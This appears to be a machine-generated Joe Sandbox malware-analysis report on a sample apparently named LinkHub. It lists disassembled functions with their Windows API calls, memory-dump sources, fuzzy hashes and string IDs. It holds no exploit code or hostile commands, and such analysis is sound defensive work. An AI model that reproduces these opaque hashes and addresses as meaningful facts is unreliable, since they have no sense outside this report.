                                                                    • Opcode Fuzzy Hash: 18c0c879ea99af5b8efc0c9b2b4c06d09f984c4cc7eab5ccaa9ae8aa9804ae7c
                                                                    • Instruction Fuzzy Hash: 0131C072611614BFEB118F50EC89FEB3BADEF49711F040066FE08DA291C6B59C51C7A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 54e44a265a21fcb08bb7aa9c539687ad634b2a2987d549f8f6c8176f5bdbd073
                                                                    • Instruction ID: ee7fc0384bd1b147e5e49135ffb842dea0953843e378f934bbf4bd4238421f74
                                                                    • Opcode Fuzzy Hash: 54e44a265a21fcb08bb7aa9c539687ad634b2a2987d549f8f6c8176f5bdbd073
                                                                    • Instruction Fuzzy Hash: A3D18C71A1071A9FDB10CF68C885FAEB7B5EF48344F14826DE916AB281D770ED91CB60
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00281B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0028194E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00281B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002819D1
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00281B7B,?,00281B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00281A64
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00281B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00281A7B
                                                                      • Part of subcall function 00273B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00260165,?,?,002B11D9,0000FFFF), ref: 00273BC5
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00281B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00281AF7
                                                                    • __freea.LIBCMT ref: 00281B22
                                                                    • __freea.LIBCMT ref: 00281B2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                    • String ID:
                                                                    • API String ID: 2829977744-0
                                                                    • Opcode ID: 69f6e66d8335c203a5099d09554f03b66edc1b693f7849913bef92461aad974a
                                                                    • Instruction ID: a613fcb532c7d09f2ec5cbecb8ba331c2d4cae83db7bb5a55871799e6f290f45
                                                                    • Opcode Fuzzy Hash: 69f6e66d8335c203a5099d09554f03b66edc1b693f7849913bef92461aad974a
                                                                    • Instruction Fuzzy Hash: 6C91E675E222169ADB24AE64C891EEEBBBDDF09314F184159E805E71C0E734DC76CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2610073882-625585964
                                                                    • Opcode ID: f503809d07d230371a1a69b3cf9bd6707ddde67949e85fff8a29aa27a574c109
                                                                    • Instruction ID: 706061f55ab9d14c848bc6de7fd727322176baea637e8d0b0350a4f2853930b2
                                                                    • Opcode Fuzzy Hash: f503809d07d230371a1a69b3cf9bd6707ddde67949e85fff8a29aa27a574c109
                                                                    • Instruction Fuzzy Hash: EA918171A20625ABDF24CF94CC48FAEBBB8EF45314F14865DE505AB180D7B0E995CFA0
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 002B1C1B
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002B1C43
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 002B1C67
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002B1C97
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002B1D1E
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002B1D83
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002B1DEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                    • String ID:
                                                                    • API String ID: 2550207440-0
                                                                    • Opcode ID: 546644c0638baeb9e814e2412c9624746eacca8de274268cb8d13e54437a488a
                                                                    • Instruction ID: 052ff47bfa6b74bf3693a87aff3c8a95e23747b4ac09bd430cd4442afe7984db
                                                                    • Opcode Fuzzy Hash: 546644c0638baeb9e814e2412c9624746eacca8de274268cb8d13e54437a488a
                                                                    • Instruction Fuzzy Hash: A9910171A2021A9FEB009F94C895BFEB7B4FF05791F14402AE900EB291D774A970CF51
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 002C43C8
                                                                    • CharUpperBuffW.USER32(?,?), ref: 002C44D7
                                                                    • _wcslen.LIBCMT ref: 002C44E7
                                                                    • VariantClear.OLEAUT32(?), ref: 002C467C
                                                                      • Part of subcall function 002B169E: VariantInit.OLEAUT32(00000000), ref: 002B16DE
                                                                      • Part of subcall function 002B169E: VariantCopy.OLEAUT32(?,?), ref: 002B16E7
                                                                      • Part of subcall function 002B169E: VariantClear.OLEAUT32(?), ref: 002B16F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4137639002-1221869570
                                                                    • Opcode ID: 01ec9be2412bf0f86b7a1b93a263e1656354ac55c12dbcf44d16185d6d9067dc
                                                                    • Instruction ID: 1b690b85d81190eca711f08f8e8801e17b1e23eb88eaadba5e3feae7858ea2f8
                                                                    • Opcode Fuzzy Hash: 01ec9be2412bf0f86b7a1b93a263e1656354ac55c12dbcf44d16185d6d9067dc
                                                                    • Instruction Fuzzy Hash: 0A914774A243029FC714EF24C490A6AB7E5BF89314F148A2DF88987351DB31ED15CF82
                                                                    APIs
                                                                      • Part of subcall function 002A08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?,?,002A0C4E), ref: 002A091B
                                                                      • Part of subcall function 002A08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?), ref: 002A0936
                                                                      • Part of subcall function 002A08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?), ref: 002A0944
                                                                      • Part of subcall function 002A08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?), ref: 002A0954
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002C56AE
                                                                    • _wcslen.LIBCMT ref: 002C57B6
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 002C582C
                                                                    • CoTaskMemFree.OLE32(?), ref: 002C5837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 614568839-2785691316
                                                                    • Opcode ID: ea2dd964075e207e73a983296de5eb30e2f64346b95699ddba5b30c997e1a08a
                                                                    • Instruction ID: 2f895d9b7d278d6af3f6e256901467e0efd7f1563aad02583ef1b1d77a883f29
                                                                    • Opcode Fuzzy Hash: ea2dd964075e207e73a983296de5eb30e2f64346b95699ddba5b30c997e1a08a
                                                                    • Instruction Fuzzy Hash: BC910971D10629EFDF15DFA4D880EEDB7B8BF08304F10426AE515A7251DB70AA94CF60
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 002D2C1F
                                                                    • GetMenuItemCount.USER32(00000000), ref: 002D2C51
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002D2C79
                                                                    • _wcslen.LIBCMT ref: 002D2CAF
                                                                    • GetMenuItemID.USER32(?,?), ref: 002D2CE9
                                                                    • GetSubMenu.USER32(?,?), ref: 002D2CF7
                                                                      • Part of subcall function 002A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002A43AD
                                                                      • Part of subcall function 002A4393: GetCurrentThreadId.KERNEL32 ref: 002A43B4
                                                                      • Part of subcall function 002A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002A2F00), ref: 002A43BB
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002D2D7F
                                                                      • Part of subcall function 002AF292: Sleep.KERNEL32 ref: 002AF30A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 4196846111-0
                                                                    • Opcode ID: 8c4847c1899afb8aede6495aceb4a678944adbb1e3262306cb5627f78f9e0fe5
                                                                    • Instruction ID: ef83ef910873b9bac9f9c7d14db81d1a7da403f8046bf9286802991299a23ca9
                                                                    • Opcode Fuzzy Hash: 8c4847c1899afb8aede6495aceb4a678944adbb1e3262306cb5627f78f9e0fe5
                                                                    • Instruction Fuzzy Hash: E271AC75E20205EFCB04EF64C885AAEB7B5EF58310F1184AAE816AB351DB74ED51CF90
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 002AB8C0
                                                                    • GetKeyboardState.USER32(?), ref: 002AB8D5
                                                                    • SetKeyboardState.USER32(?), ref: 002AB936
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 002AB964
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 002AB983
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 002AB9C4
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002AB9E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: e0126aa92fdfe30b790a4e23104ffdd68d24eb8f8ed56c4bbf1528d02c3128e5
                                                                    • Instruction ID: f7e766b26fc2103aee942b4bcf1e35f8ee25324a465374cffec07f578f710d27
                                                                    • Opcode Fuzzy Hash: e0126aa92fdfe30b790a4e23104ffdd68d24eb8f8ed56c4bbf1528d02c3128e5
                                                                    • Instruction Fuzzy Hash: AC51C1A09247D73FFB374A348855BBABEA95B07704F088489E1D5458D3CBD8ACE4DB50
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 002AB6E0
                                                                    • GetKeyboardState.USER32(?), ref: 002AB6F5
                                                                    • SetKeyboardState.USER32(?), ref: 002AB756
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002AB782
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002AB79F
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002AB7DE
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002AB7FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 52d316f74abe38d6e732e379af913ecdbbad2f0b23d8a0793f9b3dea0c07860e
                                                                    • Instruction ID: e000a03f9d0bf5a8625e6b07c57ad3b4e931fcae9fb3c49f5620c778462d5d33
                                                                    • Opcode Fuzzy Hash: 52d316f74abe38d6e732e379af913ecdbbad2f0b23d8a0793f9b3dea0c07860e
                                                                    • Instruction Fuzzy Hash: 3A51F3A19247D63FFB338A348C15B76BE986B47704F088489E0D44A8D3DBD4ECA4DB60
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00275F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002757E3
                                                                    • __fassign.LIBCMT ref: 0027585E
                                                                    • __fassign.LIBCMT ref: 00275879
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0027589F
                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00275F16,00000000,?,?,?,?,?,?,?,?,?,00275F16,?), ref: 002758BE
                                                                    • WriteFile.KERNEL32(?,?,00000001,00275F16,00000000,?,?,?,?,?,?,?,?,?,00275F16,?), ref: 002758F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 059be5495e3b86c000a6032fd4dcebed75ea67bb597a1c4cc0cf3e8fdf4c9a2e
                                                                    • Instruction ID: c44d05107f3c1e0eccf94c63e63e8e6305731174fae0e73f97ee8eab1f3e9aef
                                                                    • Opcode Fuzzy Hash: 059be5495e3b86c000a6032fd4dcebed75ea67bb597a1c4cc0cf3e8fdf4c9a2e
                                                                    • Instruction Fuzzy Hash: 8151B070A10659DFCB10CFA8D885BEEFBF8EF08310F14811AEA59E7291D7709951CBA1
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 002630BB
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 002630C3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00263151
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0026317C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 002631D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 98d37ed1d319d90ccae63c0080e9e951afa2086e1a4fb95bc162d7691262b8f6
                                                                    • Instruction ID: 5b500dc4b7b1f20950047b754af0e8c69dd6ce24174f744c94389b51481e36f1
                                                                    • Opcode Fuzzy Hash: 98d37ed1d319d90ccae63c0080e9e951afa2086e1a4fb95bc162d7691262b8f6
                                                                    • Instruction Fuzzy Hash: C341D734E202099BCF10DF68CC95A9EBBB5BF45324F148195E818AB392D731DBA5CF91
                                                                    APIs
                                                                      • Part of subcall function 002C3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002C3AD7
                                                                      • Part of subcall function 002C3AAB: _wcslen.LIBCMT ref: 002C3AF8
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C1B6F
                                                                    • WSAGetLastError.WSOCK32 ref: 002C1B7E
                                                                    • WSAGetLastError.WSOCK32 ref: 002C1C26
                                                                    • closesocket.WSOCK32(00000000), ref: 002C1C56
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 2675159561-0
                                                                    • Opcode ID: 7eb31926a5b622eafc27922b81b2a77c18760846a1805ff746cbff8d5c6c157c
                                                                    • Instruction ID: 559c0683fd96e2148674d0926c9d824c6c2dc2f044f2ed31aec8d5aed299a042
                                                                    • Opcode Fuzzy Hash: 7eb31926a5b622eafc27922b81b2a77c18760846a1805ff746cbff8d5c6c157c
                                                                    • Instruction Fuzzy Hash: 8D410531620505AFDB109F24C846FA9BBE9EF42324F14815AF8059B292D770EDA1CFE1
                                                                    APIs
                                                                      • Part of subcall function 002AE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002AD7CD,?), ref: 002AE714
                                                                      • Part of subcall function 002AE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002AD7CD,?), ref: 002AE72D
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002AD7F0
                                                                    • MoveFileW.KERNEL32(?,?), ref: 002AD82A
                                                                    • _wcslen.LIBCMT ref: 002AD8B0
                                                                    • _wcslen.LIBCMT ref: 002AD8C6
                                                                    • SHFileOperationW.SHELL32(?), ref: 002AD90C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 3164238972-1173974218
                                                                    • Opcode ID: dab53e2b8f5e7f4de5c832f1f4e6677103825f3673a1b295941af56fb7a16951
                                                                    • Instruction ID: 140879cff791aae90f2a41d9b5a6eb58ac3916ba94cba65775176769aee44790
                                                                    • Opcode Fuzzy Hash: dab53e2b8f5e7f4de5c832f1f4e6677103825f3673a1b295941af56fb7a16951
                                                                    • Instruction Fuzzy Hash: D4416571D152199FDF12EFA4D985BDE77B8AF09340F0004E6A506EB142EE34AB99CF10
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 002B4310
                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 002B4367
                                                                    • TranslateMessage.USER32(?), ref: 002B4390
                                                                    • DispatchMessageW.USER32(?), ref: 002B439A
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002B43AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                    • String ID: (1
                                                                    • API String ID: 2256411358-3903994380
                                                                    • Opcode ID: 8e338fba38d87b54f9b6cf62f5229961bcabdc1402734ece129335588202eed9
                                                                    • Instruction ID: fc518c5ce4d9aba1fc0eb976e9b77614668a49a141290bda47da87ac3bd62940
                                                                    • Opcode Fuzzy Hash: 8e338fba38d87b54f9b6cf62f5229961bcabdc1402734ece129335588202eed9
                                                                    • Instruction Fuzzy Hash: 68319870924346DEEB25AF74D888FF737ECAB05344F184599D4A2C21A2E3A49975CB11
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002D38B8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D38EB
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D3920
                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002D3952
                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002D397C
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D398D
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D39A7
                                                                    Memory Dump Source
